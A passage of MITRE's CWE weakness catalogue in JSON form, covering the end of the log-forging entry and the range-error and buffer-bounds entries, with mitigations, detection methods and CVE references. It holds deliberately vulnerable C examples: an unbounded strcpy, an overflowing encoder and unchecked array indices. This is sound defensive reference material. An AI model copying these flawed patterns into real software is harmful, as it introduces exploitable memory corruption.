logged:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"INFO: Failed to parse val=twenty-one"},{"xhtml:div":"INFO: User logged out=badguy"}]}},"Clearly, attackers can use this same mechanism to insert arbitrary log entries."]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2006-4624","Description":"Chain: inject fake log entries with fake timestamps using CRLF injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4624"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Log Forging"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS03-J","Entry_Name":"Do not log unsanitized user input","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"SEI CERT Oracle Coding Standard for Java"},"Entry_ID":"IDS03-J","Entry_Name":"Do not log unsanitized user input","Mapping_Fit":"Exact"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"268"}},{"attr":{"@_CAPEC_ID":"81"}},{"attr":{"@_CAPEC_ID":"93"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-52"}},{"attr":{"@_External_Reference_ID":"REF-53"}},{"attr":{"@_External_Reference_ID":"REF-43"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated References, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, References, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Background_Details, Common_Consequences, Description, Other_Notes, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Log Forging","attr":{"@_Date":"2008-04-11"}},{"#text":"Incorrect Output Sanitization for Logs","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Output Sanitization for Logs","attr":{"@_Date":"2010-06-21"}}]}},"118":{"attr":{"@_ID":"118","@_Name":"Incorrect Access of Indexable Resource (\'Range Error\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not restrict or incorrectly restricts operations within the boundaries of a resource that is accessed using an index or pointer, such as memory or files.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP8","Entry_Name":"Faulty Buffer Access"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"14"}},{"attr":{"@_CAPEC_ID":"24"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"46"}},{"attr":{"@_CAPEC_ID":"47"}},{"attr":{"@_CAPEC_ID":"8"}},{"attr":{"@_CAPEC_ID":"9"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships, Time_of_Introduction"}],"Previous_Entry_Name":[{"#text":"Range Errors","attr":{"@_Date":"2008-09-09"}},{"#text":"Improper Access of Indexable Resource (aka \'Range Error\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Access of Indexable Resource (\'Range Error\')","attr":{"@_Date":"2017-05-03"}}]}},"119":{"attr":{"@_ID":"119","@_Name":"Improper Restriction of Operations within the Bounds of a Memory Buffer","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Stable"},"Description":"The software performs operations on a memory buffer, but it can read from or write to a memory location that is outside of the intended boundary of the buffer.","Extended_Description":{"xhtml:p":["Certain languages allow direct addressing of memory locations and do not automatically ensure that these locations are valid for the memory buffer that is being referenced. This can cause read or write operations to be performed on memory locations that may be associated with other variables, data structures, or internal program data.","As a result, an attacker may be able to execute arbitrary code, alter the intended control flow, read sensitive information, or cause the system to crash."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"118","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}},{"attr":{"@_Class":"Assembly","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":[{"Term":"Buffer Overflow","Description":"The \\"buffer overflow\\" term has many different meanings to different audiences.  From a CWE mapping perspective, this term should be avoided where possible. Some researchers, developers, and tools intend for it to mean \\"write past the end of a buffer,\\" whereas other use the same term to mean \\"any read or write outside the boundaries of a buffer, whether before the beginning of the buffer or after the end of the buffer.\\"  Still others using the same term could mean \\"any action after the end of a buffer, whether it is a read or write.\\" Since the term is commonly used for exploitation and for vulnerabilities, it further confuses things."},{"Term":"buffer overrun","Description":"Some prominent vendors and researchers use the term \\"buffer overrun,\\" but most people use \\"buffer overflow.\\" See the alternate term for \\"buffer overflow\\" for context."},{"Term":"memory safety","Description":"\\"Memory safety\\" is generally used for techniques that avoid weaknesses related to memory access, such as those identified by CWE-119 and its descendants. However, the term is not formal, and there is likely disagreement between practitioners as to which weaknesses are implicitly covered by the \\"memory safety\\" term."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Execute Unauthorized Code or Commands","Modify Memory"],"Note":"If the memory accessible by the attacker can be effectively controlled, it may be possible to execute arbitrary code, as with a standard buffer overflow. If the attacker can overwrite a pointer\'s worth of memory (usually 32 or 64 bits), they can redirect a function pointer to their own malicious code. Even when the attacker can only modify a single byte arbitrary code execution can be possible. Sometimes this is because the same problem can be exploited repeatedly to the same effect. Other times it is because the attacker can overwrite security-critical application-specific data -- such as a flag indicating whether the user is an administrator."},{"Scope":["Availability","Confidentiality"],"Impact":["Read Memory","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop."},{"Scope":"Confidentiality","Impact":"Read Memory","Note":"In the case of an out-of-bounds read, the attacker may have access to sensitive information. If the sensitive information contains system details, such as the current buffers position in memory, this knowledge can be used to craft further attacks, possibly with more severe consequences."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges."]},"Effectiveness":"High","Effectiveness_Notes":"Detection techniques for buffer-related errors are more mature than for most other weakness types."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Binary / Bytecode Quality Analysis","Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Source Code Quality Analyzer"}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer.","Be wary that a language\'s interface to native code may still be subject to overflows, even if the language itself is theoretically safe."]}},{"attr":{"@_Mitigation_ID":"MIT-4.1"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Examples include the Safe C String Library (SafeStr) by Messier and Viega [REF-57], and the Strsafe.h library from Microsoft [REF-56]. These libraries provide safer versions of overflow-prone string-handling functions."]},"Effectiveness_Notes":"This is not a complete solution, since many buffer overflows are not related to strings."},{"attr":{"@_Mitigation_ID":"MIT-10"},"Phase":"Build and Compilation","Strategy":"Compilation or Build Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.","For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-9"},"Phase":"Implementation","Description":{"xhtml:p":"Consider adhering to the following rules when allocating and managing an application\'s memory:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Double check that the buffer is as large as specified.","When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string.","Check buffer boundaries if accessing the buffer in a loop and make sure there is no danger of writing past the allocated space.","If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions."]}}}},{"attr":{"@_Mitigation_ID":"MIT-11"},"Phase":"Operation","Strategy":"Environment Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that randomly arrange the positions of a program\'s executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.","Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-12"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-60] [REF-61].","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software\'s state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-13"},"Phase":"Implementation","Description":"Replace unbounded copy functions with analogous functions that support length arguments, such as strcpy with strncpy. Create these if they are not available.","Effectiveness":"Moderate","Effectiveness_Notes":"This approach is still susceptible to calculation errors, including issues such as off-by-one errors (CWE-193) and incorrectly calculating buffer lengths (CWE-131)."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp-&gt;h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["This function allocates a buffer of 64 bytes to store the hostname, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker.","Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-19"},"Intro_Text":"This example applies an encoding procedure to an input string and stores it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char * copy_input(char *user_supplied_string){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int i, dst_index;char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);if ( MAX_SIZE &lt;= strlen(user_supplied_string) ){}dst_index = 0;for ( i = 0; i &lt; strlen(user_supplied_string); i++ ){}return dst_buf;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"die(\\"user string too long, die evil hacker!\\");","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( \'&amp;\' == user_supplied_string[i] ){}else if (\'&lt;\' == user_supplied_string[i] ){}else dst_buf[dst_index++] = user_supplied_string[i];","xhtml:div":[{"#text":"dst_buf[dst_index++] = \'&amp;\';dst_buf[dst_index++] = \'a\';dst_buf[dst_index++] = \'m\';dst_buf[dst_index++] = \'p\';dst_buf[dst_index++] = \';\';","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"/* encode to &amp;lt; */"}}],"xhtml:br":["",""]}}]}}}},"Body_Text":"The programmer attempts to encode the ampersand character in the user-controlled string, however the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands."},{"attr":{"@_Demonstrative_Example_ID":"DX-90"},"Intro_Text":"The following example asks a user for an offset into an array to select an item.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main (int argc, char **argv) {}","xhtml:br":"","xhtml:div":{"#text":"char *items[] = {\\"boat\\", \\"car\\", \\"truck\\", \\"train\\"};int index = GetUntrustedOffset();printf(\\"You selected %s\\\\n\\", items[index-1]);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The programmer allows the user to specify which element in the list to select, however an attacker can provide an out-of-bounds offset, resulting in a buffer over-read (CWE-126)."},{"attr":{"@_Demonstrative_Example_ID":"DX-100"},"Intro_Text":"In the following code, the method retrieves a value from an array at a specific array index location that is given as an input parameter to the method","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int getValueFromArray(int *array, int len, int index) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int value;if (index &lt; len) {}else {}return value;","xhtml:br":["","","","","","","","","","","",""],"xhtml:i":["// check that the array index is less than the maximum","// length of the array","// if array index is invalid then output error message","// and return value indicating error"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"value = array[index];","xhtml:br":["",""],"xhtml:i":"// get the value at the specified index of the array"}},{"#text":"printf(\\"Value is: %d\\\\n\\", array[index]);value = -1;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...if (index &gt;= 0 &amp;&amp; index &lt; len) {...","xhtml:br":["","","","","","","",""],"xhtml:i":["// check that the array index is within the correct","// range of values for the array"]}}],"Body_Text":"However, this method only verifies that the given array index is less than the maximum length of the array but does not check for the minimum value (CWE-839). This will allow a negative value to be accepted as the input array index, which will result in a out of bounds read (CWE-125) and may allow access to sensitive memory. The input array index should be checked to verify that is within the maximum and minimum range required for the array (CWE-129). In this example the if statement should be modified to include a minimum range check, as shown below."},{"Intro_Text":"Windows provides the _mbs family of functions to perform various operations on multibyte strings. When these functions are passed a malformed multibyte string, such as a string containing a valid leading byte followed by a single null byte, they can read or write past the end of the string buffer causing a buffer overflow. The following functions all pose a risk of buffer overflow: _mbsinc _mbsdec _mbsncat _mbsncpy _mbsnextc _mbsnset _mbsrev _mbsset _mbsstr _mbstok _mbccpy _mbslen"}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-2550","Description":"Classic stack-based buffer overflow in media player using a long entry in a playlist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2550"},{"Reference":"CVE-2009-2403","Description":"Heap-based buffer overflow in media player using a long entry in a playlist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2403"},{"Reference":"CVE-2009-0689","Description":"large precision value in a format string triggers overflow","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0689"},{"Reference":"CVE-2009-0690","Description":"negative offset value leads to out-of-bounds read","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0690"},{"Reference":"CVE-2009-1532","Description":"malformed inputs cause accesses of uninitialized or previously-deleted objects, leading to memory corruption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1532"},{"Reference":"CVE-2009-1528","Description":"chain: lack of synchronization leads to memory corruption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1528"},{"Reference":"CVE-2021-29529","Description":"Chain: machine-learning product can have a heap-based\\n\\t      buffer overflow (CWE-122) when some integer-oriented bounds are\\n\\t      calculated by using ceiling() and floor() on floating point values\\n\\t      (CWE-1339)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29529"},{"Reference":"CVE-2009-0558","Description":"attacker-controlled array index leads to code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0558"},{"Reference":"CVE-2009-0269","Description":"chain: -1 value from a function call was intended to indicate an error, but is used as an array index instead.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0269"},{"Reference":"CVE-2009-0566","Description":"chain: incorrect calculations lead to incorrect pointer dereference and memory corruption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0566"},{"Reference":"CVE-2009-1350","Description":"product accepts crafted messages that lead to a dereference of an arbitrary pointer","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1350"},{"Reference":"CVE-2009-0191","Description":"chain: malformed input causes dereference of uninitialized memory","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0191"},{"Reference":"CVE-2008-4113","Description":"OS kernel trusts userland-supplied length value, allowing reading of sensitive information","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4113"},{"Reference":"CVE-2005-1513","Description":"Chain: integer overflow in securely-coded mail program leads to buffer overflow. In 2005, this was regarded as unrealistic to exploit, but in 2020, it was rediscovered to be easier to exploit due to evolutions of the technology.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1513"},{"Reference":"CVE-2003-0542","Description":"buffer overflow involving a regular expression with a large number of captures","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0542"},{"Reference":"CVE-2017-1000121","Description":"chain: unchecked message size metadata allows integer overflow (CWE-190) leading to buffer overflow (CWE-119).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000121"}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A5","Entry_Name":"Buffer Overflows","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR00-C","Entry_Name":"Understand how arrays work"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR30-C","Entry_Name":"Do not form or use out-of-bounds pointers or array subscripts","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR38-C","Entry_Name":"Guarantee that library functions do not form invalid pointers","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV01-C","Entry_Name":"Do not make assumptions about the size of an environment variable"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP39-C","Entry_Name":"Do not access a variable through a pointer of an incompatible type","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO37-C","Entry_Name":"Do not assume character data has been read"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR31-C","Entry_Name":"Guarantee that storage for strings has sufficient space for character data and the null terminator","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR32-C","Entry_Name":"Do not pass a non-null-terminated character sequence to a library function that expects a string","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":7,"Entry_Name":"Buffer 